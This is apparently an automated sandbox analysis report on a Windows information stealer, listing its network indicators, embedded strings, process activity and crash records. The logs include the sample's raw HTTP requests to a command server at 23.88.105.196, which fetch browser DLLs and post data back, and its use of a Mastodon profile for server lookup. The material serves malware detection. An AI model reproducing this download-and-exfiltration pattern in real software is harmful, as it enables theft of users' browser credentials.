Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/1013
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/GN46WT4N9GWA0LWA3Ur
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/freebl3.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/freebl3.dllQu
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dll4
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dll=u
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dllgGu
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dllyuG
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/msvcp140.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/msvcp140.dllQ)G
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/msvcp140.dllb3
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/msvcp140.dllu
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/nss3.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/softokn3.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/softokn3.dll196/freebl3.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/vcruntime140.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.427737262.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/vcruntime140.dllgc
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/vcruntime140.dll~p
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://crl.m&
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://microsoft.co
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ocsp.thawte.com0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue[1].dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://www.mozilla.com0
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://mas.to
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://mas.to/.well-known/webfinger?resource=acct%3Akillern0%40mas.to
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://mas.to/users/killern0
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://mas.to;
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://media.mas.to
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /1013 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: unknown DNS traffic detected: queries for: mas.to
Source: global traffic HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49742 version: TLS 1.2

System Summary:

barindex
Uses 32bit PE files
Source: cYKFZFK0Rg.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
One or more processes crash
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 868
Sample file is different than original file name gathered from version info
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs cYKFZFK0Rg.exe
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs cYKFZFK0Rg.exe
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs cYKFZFK0Rg.exe
Source: cYKFZFK0Rg.exe, 00000001.00000003.426600931.000000000375B000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs cYKFZFK0Rg.exe
PE file contains strange resources
Source: cYKFZFK0Rg.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: cYKFZFK0Rg.exe Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\cYKFZFK0Rg.exe 'C:\Users\user\Desktop\cYKFZFK0Rg.exe'
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 868
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 888
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 896
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 1104
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 1516
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 2028
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 2036
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 2052
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERA894.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.winEXE@9/44@1/2
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: cYKFZFK0Rg.exe, 00000001.00000000.310964410.0000000000400000.00000040.00020000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: cYKFZFK0Rg.exe, 00000001.00000000.310964410.0000000000400000.00000040.00020000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cYKFZFK0Rg.exe, 00000001.00000000.310964410.0000000000400000.00000040.00020000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5468
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: cYKFZFK0Rg.exe Static file information: File size 1648640 > 1048576
Source: cYKFZFK0Rg.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x121a00
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb+ source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbjX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdbN source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
